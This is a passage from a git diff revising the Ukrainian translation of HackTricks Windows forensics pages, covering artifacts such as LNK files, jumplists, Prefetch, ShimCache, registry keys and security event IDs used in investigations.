цього файлу, **інформацію про том**, де зберігається файл, та **папку цільового файлу**. Ця інформація може бути корисною для відновлення цих файлів у випадку їх видалення. +Ці автоматично створені файли посилань **містять інформацію про походження**, наприклад, чи це **файл** **чи** **папка**, **часи MAC** цього файлу, **інформацію про том**, де зберігається файл, та **папку цільового файлу**. Ця інформація може бути корисною для відновлення цих файлів у разі їх видалення. -Крім того, **дата створення посилання** - це перший **час**, коли оригінальний файл був **використаний**, а **дата** **зміни** посилання - **останній** **раз**, коли використовувався початковий файл. +Крім того, **дата створення посилання** - це перший **час**, коли оригінальний файл був **використаний**, а **дата** **зміни** посилання - **останній** **раз**, коли використовувався оригінальний файл. Для огляду цих файлів ви можете використовувати [**LinkParser**](http://4discovery.com/our-tools/). @@ -116,11 +121,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs **Jumplists**, створені автоматично, зберігаються в `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplists називаються за форматом `{id}.autmaticDestinations-ms`, де початковий ID - це ID додатка. -Користувацькі jumplists зберігаються в `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`, і їх створює додаток зазвичай через те, що сталося щось **важливе** з файлом (можливо, відзначено як улюблений). +Користувацькі jumplists зберігаються в `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`, і їх створює додаток зазвичай через те, що щось **важливе** сталося з файлом (можливо, він був позначений як улюблений). **Час створення** будь-якого jumplist вказує на **перший раз, коли файл був доступний**, а **час зміни - останній раз**. -Ви можете переглянути jumplists за допомогою [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). +Ви можете перевірити jumplists за допомогою [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). ![](<../../../.gitbook/assets/image (474).png>) @@ -160,9 +165,9 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ![](<../../../.gitbook/assets/image (483).png>) -### Плагін та грати очищення +### Плагін та грати очистку -Заплановане завдання, відоме як 'Plug and Play Cleanup', призначене в основному для видалення застарілих версій драйверів. На відміну від вказаної мети збереження останньої версії пакету драйверів, онлайн-джерела вказують, що воно також спрямоване на драйвери, які були неактивними протягом 30 днів. Відповідно, драйвери для знімних пристроїв, які не підключалися протягом останніх 30 днів, можуть бути видалені. +Заплановане завдання, відоме як 'Plug and Play Cleanup', призначене в основному для видалення застарілих версій драйверів. Незважаючи на вказану мету збереження останньої версії пакету драйверів, джерела в Інтернеті вказують, що воно також спрямоване на драйвери, які були неактивними протягом 30 днів. Відповідно, драйвери для знімних пристроїв, які не підключалися протягом останніх 30 днів, можуть бути видалені. Завдання розташоване за наступним шляхом: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. @@ -174,10 +179,10 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs - **pnpclean.dll**: Ця DLL відповідає за фактичний процес очищення. - **UseUnifiedSchedulingEngine**: Встановлено на `TRUE`, що вказує на використання загального розкладування завдань. - **MaintenanceSettings**: -- **Період ('P1M')**: Направляє Планувальник завдань ініціювати завдання очищення щомісяця під час регулярного автоматичного обслуговування. -- **Крайній термін ('P2M')**: Інструкція для Планувальника завдань, якщо завдання не вдалося протягом двох послідовних місяців, виконати завдання під час аварійного автоматичного обслуговування. +- **Період ('P1M')**: Вказує планувальнику завдань ініціювати завдання очищення щомісяця під час звичайного автоматичного обслуговування. +- **Термін ('P2M')**: Інструктує планувальник завдань, якщо завдання не вдалося протягом двох послідовних місяців, виконати завдання під час аварійного автоматичного обслуговування. -Ця конфігурація забезпечує регулярне обслуговування та очищення драйверів, з можливістю повторної спроби завдання у разі послідовних невдач. +Ця конфігурація забезпечує регулярне обслуговування та очищення драйверів, з можливістю повторної спроби завдання у випадку послідовних невдач. **Для отримання додаткової інформації перегляньте:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) @@ -219,9 +224,9 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs Ви можете відкрити файл PST за допомогою інструменту [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). ![](<../../../.gitbook/assets/image (485).png>) -### Файли OST Microsoft Outlook +### Файли Microsoft Outlook OST -Файл **OST** генерується Microsoft Outlook, коли він налаштований з **IMAP** або сервером **Exchange**, зберігаючи подібну інформацію до файлу PST. Цей файл синхронізується з сервером, зберігаючи дані за **останні 12 місяців** до **максимального розміру 50 ГБ**, і розташований в тій же теки, що і файл PST. Для перегляду файлу OST можна використовувати [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html). +Файл **OST** генерується Microsoft Outlook, коли він налаштований з **IMAP** або **Exchange** сервером, зберігаючи подібну інформацію до файлу PST. Цей файл синхронізується з сервером, зберігаючи дані за **останні 12 місяців** до **максимального розміру 50 ГБ**, і розташовується в тій же теки, що і файл PST. Для перегляду файлу OST можна використовувати [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html). ### Отримання вкладень @@ -230,7 +235,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs - Для **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` - Для **IE11 та вище**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` -### Файли MBOX Thunderbird +### Файли Thunderbird MBOX **Thunderbird** використовує файли **MBOX** для зберігання даних, розташованих в `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. @@ -238,7 +243,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs - **Windows XP та 8-8.1**: Доступ до теки з мініатюрами генерує файл `thumbs.db`, який зберігає попередні перегляди зображень, навіть після видалення. - **Windows 7/10**: `thumbs.db` створюється при доступі через мережу за допомогою шляху UNC. -- **Windows Vista та новіші**: Попередні перегляди мініатюр централізовані в `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` з файлами з назвою **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) та [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) - це інструменти для перегляду цих файлів. +- **Windows Vista та новіше**: Попередні перегляди мініатюр централізовані в `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` з файлами, названими **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) та [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) - це інструменти для перегляду цих файлів. ### Інформація з реєстру Windows @@ -246,8 +251,8 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs - `%windir%\System32\Config` для різних підключів `HKEY_LOCAL_MACHINE`. - `%UserProfile%{User}\NTUSER.DAT` для `HKEY_CURRENT_USER`. -- Починаючи з Windows Vista та новіших версій, файли реєстру `HKEY_LOCAL_MACHINE` резервуються в `%Windir%\System32\Config\RegBack\`. -- Крім того, інформація про виконання програм зберігається в `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` починаючи з Windows Vista та Windows 2008 Server. +- Windows Vista та пізніші версії резервують файли реєстру `HKEY_LOCAL_MACHINE` в `%Windir%\System32\Config\RegBack\`. +- Крім того, інформація про виконання програм зберігається в `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` з Windows Vista та Windows 2008 Server і пізніше. ### Інструменти @@ -256,11 +261,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs * **Редактор реєстру**: Встановлений в Windows. Це графічний інтерфейс для навігації через реєстр Windows поточної сесії. * [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): Дозволяє завантажити файл реєстру та навігувати через них за допомогою графічного інтерфейсу. Також містить закладки, які підсвічують ключі з цікавою інформацією. * [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Знову, має графічний інтерфейс, який дозволяє навігувати через завантажений реєстр та містить плагіни, які підсвічують цікаву інформацію всередині завантаженого реєстру. -* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Інша GUI-програма, яка може видобувати важливу інформацію з завантаженого реєстру. +* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Інша GUI-програма, здатна видобувати важливу інформацію з завантаженого реєстру. ### Відновлення видаленого елементу -Коли ключ видаляється, він позначається як такий, але до тих пір, поки простір, який він займає, не буде потрібний, він не буде видалений. Тому, використовуючи інструменти, такі як **Registry Explorer**, можливо відновити ці видалені ключі. +Коли ключ видаляється, він позначається як такий, але до тих пір, поки простір, який він займає, не буде потрібний, він не буде видалений. Тому, використовуючи інструменти, такі як **Registry Explorer**, можна відновити ці видалені ключі. ### Час останньої зміни @@ -270,7 +275,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs Файл/гілка **SAM** містить **хеші паролів користувачів, груп та користувачів** системи. -У `SAM\Domains\Account\Users` можна отримати ім'я користувача, RID, останній вхід, останній невдалий вхід, лічильник входів, політику паролю та дату створення облікового запису. Для отримання **хешів** також **потрібен** файл/гілка **SYSTEM**. +У `SAM\Domains\Account\Users` можна отримати ім'я користувача, RID, останній вхід, останній невдалий вхід, лічильник входів, політику паролю та дату створення облікового запису. Для отримання **хешів** також **потрібний** файл/гілка **SYSTEM**. ### Цікаві записи в реєстрі Windows @@ -296,7 +301,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs Попереднє завантаження - це техніка, яка дозволяє комп'ютеру тихо **завантажувати необхідні ресурси для відображення вмісту**, до якого користувач **може звернутися у найближчому майбутньому**, щоб ресурси можна було отримати швидше. -Windows Prefetch полягає в створенні **кешів виконаних програм**, щоб мати можливість завантажувати їх швидше. Ці кеші створюються у вигляді файлів `.pf` за шляхом: `C:\Windows\Prefetch`. Є обмеження на 128 файлів у XP/VISTA/WIN7 та 1024 файлів у Win8/Win10. +Windows Prefetch полягає в створенні **кешів виконаних програм**, щоб мати змогу завантажувати їх швидше. Ці кеші створюються у вигляді файлів `.pf` за шляхом: `C:\Windows\Prefetch`. Є обмеження на 128 файлів у XP/VISTA/WIN7 та 1024 файлів у Win8/Win10. Ім'я файлу створюється як `{program_name}-{hash}.pf` (хеш базується на шляху та аргументах виконуваного файлу). У W10 ці файли стиснуті. Зверніть увагу, що саме наявність файлу вказує на те, що **програма була виконана** у певний момент. @@ -310,8 +315,8 @@ Windows Prefetch полягає в створенні **кешів викона ### Суперпередзавантаження -**Суперпередзавантаження** має той самий мета, що і передзавантаження, **завантажує програми швидше**, передбачаючи, що буде завантажено наступним. Однак воно не заміщує службу передзавантаження.\ -Ця служба буде генерувати базові файли в `C:\Windows\Prefetch\Ag*.db`. +**Суперпередзавантаження** має ту ж мету, що і передзавантаження, **завантажувати програми швидше**, передбачаючи, що буде завантажено наступним. Однак воно не замінює службу передзавантаження.\ +Ця служба буде генерувати базові файли у `C:\Windows\Prefetch\Ag*.db`. У цих базах даних ви можете знайти **ім'я** **програми**, **кількість** **виконань**, **відкриті файли**, **обсяг доступу**, **повний шлях**, **проміжки часу** та **відмітки часу**. @@ -319,7 +324,7 @@ Windows Prefetch полягає в створенні **кешів викона ### SRUM -**Монітор використання системних ресурсів** (SRUM) **відстежує** **ресурси**, **використані процесом**. Він з'явився в W8 і зберігає дані в базі даних ESE, розташованій в `C:\Windows\System32\sru\SRUDB.dat`. +**Монітор використання системних ресурсів** (SRUM) **відстежує** **ресурси**, **використані процесом**. Він з'явився в W8 і зберігає дані в базі даних ESE, розташованій у `C:\Windows\System32\sru\SRUDB.dat`. Він надає наступну інформацію: @@ -339,7 +344,7 @@ Windows Prefetch полягає в створенні **кешів викона ``` ### AppCompatCache (ShimCache) -**AppCompatCache**, також відомий як **ShimCache**, є частиною **Бази даних сумісності програм**, розробленої **Microsoft** для вирішення проблем сумісності програм. Цей компонент системи записує різні частини метаданих файлів, до яких входять: +**AppCompatCache**, також відомий як **ShimCache**, є частиною **Бази даних сумісності програм** розробленої **Microsoft** для вирішення проблем сумісності програм. Цей компонент системи записує різні частини метаданих файлів, до яких входять: - Повний шлях до файлу - Розмір файлу @@ -347,10 +352,10 @@ Windows Prefetch полягає в створенні **кешів викона - Час останнього оновлення ShimCache - Прапорець виконання процесу -Такі дані зберігаються в реєстрі за конкретними місцями в залежності від версії операційної системи: +Такі дані зберігаються в реєстрі за конкретними розташуваннями в залежності від версії операційної системи: -- Для XP дані зберігаються в `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` з можливістю 96 записів. -- Для Server 2003, а також для версій Windows 2008, 2012, 2016, 7, 8 та 10, шлях зберігання - `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, з розміщенням відповідно 512 та 1024 записів. +- Для XP дані зберігаються в `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` з можливістю для 96 записів. +- Для Server 2003, а також для версій Windows 2008, 2012, 2016, 7, 8 та 10, шлях зберігання є `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, з можливістю для 512 та 1024 записів відповідно. Для аналізу збереженої інформації рекомендується використовувати [інструмент AppCompatCacheParser](https://github.com/EricZimmerman/AppCompatCacheParser). @@ -386,17 +391,17 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen ### **Windows Store** -Встановлені програми можна знайти в `\ProgramData\Microsoft\Windows\AppRepository\`\ -У цьому репозиторії є **журнал** з **кожною встановленою програмою** в системі всередині бази даних **`StateRepository-Machine.srd`**. +Встановлені додатки можна знайти в `\ProgramData\Microsoft\Windows\AppRepository\`\ +У цьому репозиторії є **журнал** з **кожним встановленим додатком** в системі всередині бази даних **`StateRepository-Machine.srd`**. -У таблиці Application цієї бази даних можна знайти стовпці: "Ідентифікатор програми", "Номер пакету" та "Назва відображення". Ці стовпці містять інформацію про передвстановлені та встановлені програми, і можна визначити, чи були деякі програми видалені, оскільки ідентифікатори встановлених програм повинні бути послідовними. +У таблиці Application цієї бази даних можна знайти стовпці: "Ідентифікатор додатка", "Номер пакету" та "Відображуване ім'я". Ці стовпці містять інформацію про передвстановлені та встановлені додатки, і можна визначити, чи були деякі додатки видалені, оскільки ідентифікатори встановлених додатків повинні бути послідовними. -Також можна **знайти встановлену програму** за шляхом реєстру: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ -І **видалені програми** в: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` +Також можна **знайти встановлені додатки** за шляхом реєстру: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ +І **видалені додатки** в: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` ## Події Windows -Інформація, яка з'являється в подіях Windows: +Інформація, яка з'являється в подіях Windows, включає: * Що сталося * Мітка часу (UTC + 0) @@ -404,7 +409,7 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen * Залучені хости (ім'я хоста, IP) * Активи, до яких зверталися (файли, теки, принтери, служби) -Журнали знаходяться в `C:\Windows\System32\config` до Windows Vista і в `C:\Windows\System32\winevt\Logs` після Windows Vista. До Windows Vista журнали подій були у бінарному форматі, а після них вони у **форматі XML** та використовують розширення **.evtx**. +Журнали знаходяться в `C:\Windows\System32\config` до Windows Vista і в `C:\Windows\System32\winevt\Logs` після Windows Vista. До Windows Vista журнали подій були у бінарному форматі, а після цього вони у **форматі XML** та використовують розширення **.evtx**. Місце розташування файлів подій можна знайти в реєстрі SYSTEM за адресою **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** @@ -412,13 +417,13 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen ## Розуміння журналювання подій безпеки Windows -Події доступу записуються у файл конфігурації безпеки, розташований за адресою `C:\Windows\System32\winevt\Security.evtx`. Розмір цього файлу можна налаштувати, і коли досягнуто його межі, старі події перезаписуються. Записані події включають вхід та вихід користувачів, дії користувачів та зміни налаштувань безпеки, а також доступ до файлів, тек та спільних активів. +Події доступу записуються у файл конфігурації безпеки, розташований за адресою `C:\Windows\System32\winevt\Security.evtx`. Розмір цього файлу можна налаштувати, і коли досягається його місткість, старі події перезаписуються. Записані події включають вхід та вихід користувачів, дії користувачів та зміни налаштувань безпеки, а також доступ до файлів, тек та спільних активів. ### Ключові ідентифікатори подій для аутентифікації користувача: - **EventID 4624**: Вказує на успішну аутентифікацію користувача. - **EventID 4625**: Сигналізує про невдачу аутентифікації. -- **EventIDs 4634/4647**: Представляють події виходу користувача з системи. +- **EventIDs 4634/4647**: Представляють події виходу користувача. - **EventID 4672**: Позначає вхід з адміністративними привілеями. #### Підтипи в межах EventID 4634/4647: @@ -428,34 +433,34 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen - **Пакетний (4)**: Виконання пакетних процесів. - **Службовий (5)**: Запуск служб. - **Проксі (6)**: Аутентифікація проксі. -- **Розблокування (7)**: Розблокування екрану за допомогою пароля. +- **Розблокування (7)**: Екран розблоковано за допомогою пароля. - **Мережевий текст (8)**: Передача пароля у відкритому тексті, часто з IIS. - **Нові облікові дані (9)**: Використання інших облікових даних для доступу. -- **Віддалений інтерактивний (10)**: Віддалений вхід через робочий стіл або служби терміналів. -- **Кешовий інтерактивний (11)**: Вхід з кешовими обліковими даними без звертання до контролера домену. +- **Віддалений інтерактивний (10)**: Віддалений робочий стіл або вхід через службу терміналів. +- **Кешовий інтерактивний (11)**: Вхід з кешовими обліковими даними без контакту з контролером домену. - **Кешовий віддалений інтерактивний (12)**: Віддалений вхід з кешовими обліковими даними. - **Кешове розблокування (13)**: Розблокування з кешовими обліковими даними. #### Коди статусу та підкоди статусу для EventID 4625: - **0xC0000064**: Ім'я користувача не існує - Може вказувати на атаку переліку імен користувачів. -- **0xC000006A**: Правильне ім'я користувача, але неправильний пароль - Можлива спроба вгадування або перебору пароля. +- **0xC000006A**: Правильне ім'я користувача, але неправильний пароль - Можлива спроба вгадування або перебору паролів. - **0xC0000234**: Обліковий запис користувача заблоковано - Може виникнути після атаки перебору з багатьма невдалими входами. - **0xC0000072**: Обліковий запис вимкнено - Несанкціоновані спроби доступу до вимкнених облікових записів. - **0xC000006F**: Вхід поза дозволеним часом - Вказує на спроби доступу поза встановленими годинами входу, можливий ознака несанкціонованого доступу. -- **0xC0000070**: Порушення обмежень робочої станції - Може бути спробою входу з недозволеного місця. +- **0xC0000070**: Порушення обмежень робочої станції - Може бути спробою входу з недозволеної локації. - **0xC0000193**: Термін дії облікового запису закінчився - Спроби доступу зі збіглими термінами дії облікових записів. - **0xC0000071**: Закінчився термін дії пароля - Спроби входу з застарілими паролями. - **0xC0000133**: Проблеми синхронізації часу - Великі розбіжності часу між клієнтом та сервером можуть свідчити про більш складні атаки, такі як передача квитка. - **0xC0000224**: Обов'язкова зміна пароля - Часті обов'язкові зміни можуть свідчити про спробу підірвати безпеку облікового запису. -- **0xC0000225**: Вказує на помилку системи, а не на проблему безпеки. +- **0xC0000225**: Вказує на помилку системи, а не проблему безпеки. - **0xC000015b**: Відмова від типу входу - Спроба доступу з недозволеним типом входу, наприклад, користувач, який намагається виконати вхід служби. #### EventID 4616: - **Зміна часу**: Зміна системного часу, може ускладнити аналіз подій. #### EventID 6005 та 6006: -- **Запуск та вимкнення системи**: EventID 6005 вказує на запуск системи, а EventID 6006 позначає її вимкнення. +- **Запуск та вимкнення системи**: EventID 6005 вказує на запуск системи, а EventID 6006 - на її вимкнення. #### EventID 1102: - **Видалення журналу**: Очищення журналів безпеки, що часто є сигналом приховування злочинних дій. @@ -465,7 +470,7 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen - **10100**: Оновлення драйвера USB. - **EventID 112**: Час вставлення USB-пристрою. -Для практичних прикладів симуляції цих типів входу та можливостей витягування облікових даних див. [докладний посібник Altered Security](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). +Для практичних прикладів імітації цих типів входу та можливостей витягування облікових даних див. [докладний посібник Altered Security](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). Деталі подій, включаючи коди статусу та підкоди статусу, надають додаткові відомості про причини подій, особливо помітні в Event ID 4625. @@ -475,23 +480,27 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen ### Виявлення загальних атак через події Windows -Для докладного посібника з використанням ідентифікаторів подій Windows для виявлення загальних кібератак відвідайте [Red Team Recipe](https://redteamrecipe.com/event-codes/). +Для докладного посібника з використання ідентифікаторів подій Windows для виявлення загальних кібератак відвідайте [Red Team Recipe](https://redteamrecipe.com/event-codes/). -#### Атаки методом перебору +#### Атаки перебору -Визначаються за декількома записами EventID 4625, за якими слідує EventID 4624 у разі успіху атаки. +Визначаються кількома записами EventID 4625, за якими слідує EventID 4624 у разі успіху атаки. #### Зміна часу -Фіксується за допомогою EventID 4616, зміни системного часу можуть ускладнити судово-експертний аналіз. +Записується за допомогою EventID 4616, зміни часу системи можуть ускладнити судово-слідчий аналіз. #### Відстеження USB-пристроїв -Корисні System EventIDs для відстеження USB-пристроїв включають 20001/20003/10000 для початкового використання, 10100 для оновлення драйверів та EventID 112 від DeviceSetupManager для відміток часу вставлення. -#### Події включення системи +Корисні системні EventIDs для відстеження USB-пристроїв включають 20001/20003/10000 для початкового використання, 10100 для оновлення драйверів та EventID 112 від DeviceSetupManager для відміток часу вставлення. +#### Події живлення системи -Подія з ідентифікатором 6005 вказує на запуск системи, тоді як подія з ідентифікатором 6006 позначає вимкнення. +EventID 6005 вказує на запуск системи, тоді як EventID 6006 позначає вимкнення. #### Видалення журналів -Подія безпеки з ідентифікатором 1102 сигналізує про видалення журналів, що є критичною подією для судової експертизи. +Подія безпеки EventID 1102 сигналізує про видалення журналів, що є критичною подією для судової експертизи. + +
+ +{% embed url="https://websec.nl/" %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index ba07969fb..3e2acfed5 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,20 +2,20 @@ ### Цікаві ключі реєстру Windows +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
- +{% endhint %} ### **Інформація про версію Windows та власника** - У розділі **`Software\Microsoft\Windows NT\CurrentVersion`** ви знайдете версію Windows, пакунок обслуговування, час встановлення та ім'я зареєстрованого власника простим способом. @@ -27,64 +27,79 @@ - Часовий пояс системи зберігається в **`System\ControlSet001\Control\TimeZoneInformation`**. ### **Відстеження часу доступу** -- За замовчуванням відстеження часу останнього доступу вимкнено (**`NtfsDisableLastAccessUpdate=1`**). Щоб ввімкнути його, використовуйте: +- За замовчуванням відстеження часу останнього доступу вимкнено (**`NtfsDisableLastAccessUpdate=1`**). Щоб увімкнути його, скористайтеся: `fsutil behavior set disablelastaccess 0` ### Версії Windows та пакунки обслуговування - **Версія Windows** вказує на вид (наприклад, Home, Pro) та її випуск (наприклад, Windows 10, Windows 11), тоді як **пакунки обслуговування** - це оновлення, які включають виправлення та іноді нові функції. -### Ввімкнення часу останнього доступу -- Ввімкнення відстеження часу останнього доступу дозволяє вам бачити, коли файли востаннє відкривалися, що може бути критичним для судового аналізу або моніторингу системи. +### Увімкнення часу останнього доступу +- Увімкнення відстеження часу останнього доступу дозволяє вам бачити, коли файли востаннє відкривалися, що може бути критичним для судового аналізу або моніторингу системи. ### Деталі мережевої інформації - Реєстр містить велику кількість даних про мережеві конфігурації, включаючи **типи мереж (бездротові, кабельні, 3G)** та **категорії мереж (Публічні, Приватні/Домашні, Доменні/Робочі)**, які є важливими для розуміння налаштувань мережевої безпеки та дозволів. ### Кешування клієнтської сторони (CSC) -- **CSC** покращує доступ до файлів в автономному режимі шляхом кешування копій спільних файлів. Різні налаштування **CSCFlags** контролюють, як і які файли кешуються, впливаючи на продуктивність та користувацький досвід, особливо в середовищах з періодичним підключенням. +- **CSC** покращує доступ до файлів в автономному режимі шляхом кешування копій спільних файлів. Різні налаштування **CSCFlags** контролюють, які файли кешуються та як це впливає на продуктивність та користувацький досвід, особливо в середовищах з періодичним з'єднанням. -### Програми, які автоматично запускаються -- Програми, перераховані в різних ключах реєстру `Run` та `RunOnce`, автоматично запускаються при запуску системи, впливаючи на час завантаження системи та потенційно бувши точками інтересу для ідентифікації шкідливого ПЗ або небажаного програмного забезпечення. +### Програми автозапуску +- Програми, перераховані в різних ключах реєстру `Run` та `RunOnce`, автоматично запускаються при запуску системи, впливаючи на час завантаження системи та потенційно бувши точками інтересу для ідентифікації шкідливих програм або небажаного програмного забезпечення. ### Shellbags -- **Shellbags** не лише зберігають налаштування для перегляду папок, але й надають судові докази доступу до папок навіть у випадку, якщо папка більше не існує. Вони є невартісними для розслідувань, розкриваючи діяльність користувача, яка не є очевидною іншими засобами. +- **Shellbags** не лише зберігають налаштування для перегляду папок, але також надають судові докази доступу до папок навіть у випадку, якщо папка більше не існує. Вони є невартісними для розслідувань, розкриваючи діяльність користувача, яка не є очевидною за іншими засобами. ### Інформація та судовий аналіз USB -- Деталі, збережені в реєстрі про USB-пристрої, можуть допомогти відстежити, які пристрої були підключені до комп'ютера, потенційно пов'язуючи пристрій з передачами чутливих файлів або випадками несанкціонованого доступу. +- Деталі, збережені в реєстрі про USB-пристрої, можуть допомогти відстежити, які пристрої були підключені до комп'ютера, потенційно пов'язуючи пристрій з важливими передачами файлів або випадками несанкціонованого доступу. ### Серійний номер тома - **Серійний номер тома** може бути вирішальним для відстеження конкретного екземпляра файлової системи, корисний в судових сценаріях, де потрібно встановити походження файлу на різних пристроях. ### **Деталі вимкнення** -- Час вимкнення та кількість (останній тільки для XP) зберігаються в **`System\ControlSet001\Control\Windows`** та **`System\ControlSet001\Control\Watchdog\Display`**. +- Час вимкнення та кількість (останній лише для XP) зберігаються в **`System\ControlSet001\Control\Windows`** та **`System\ControlSet001\Control\Watchdog\Display`**. ### **Конфігурація мережі** - Для докладної інформації про мережевий інтерфейс звертайтеся до **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. - Перші та останні часи підключення до мережі, включаючи підключення VPN, реєструються в різних шляхах в **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. ### **Спільні папки** -- Спільні папки та налаштування знаходяться в **`System\ControlSet001\Services\lanmanserver\Shares`**. Налаштування кешування клієнтської сторони (CSC) визначають доступність файлів в автономному режимі. +- Спільні папки та налаштування знаходяться в розділі **`System\ControlSet001\Services\lanmanserver\Shares`**. Налаштування кешування клієнтської сторони (CSC) визначають доступність файлів в автономному режимі. ### **Програми, які автоматично запускаються** -- Шляхи, такі як **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** та подібні записи в `Software\Microsoft\Windows\CurrentVersion` деталізують програми, призначені для запуску при запуску системи. +- Шляхи, такі як **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** та подібні записи в `Software\Microsoft\Windows\CurrentVersion` деталізують програми, призначені для запуску при завантаженні. ### **Пошуки та введені шляхи** - Пошуки та введені шляхи в Explorer відстежуються в реєстрі під **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** для WordwheelQuery та TypedPaths відповідно. -### **Нещодавні документи та файлів Office** -- Недавно відкриті документи та файлів Office фіксуються в 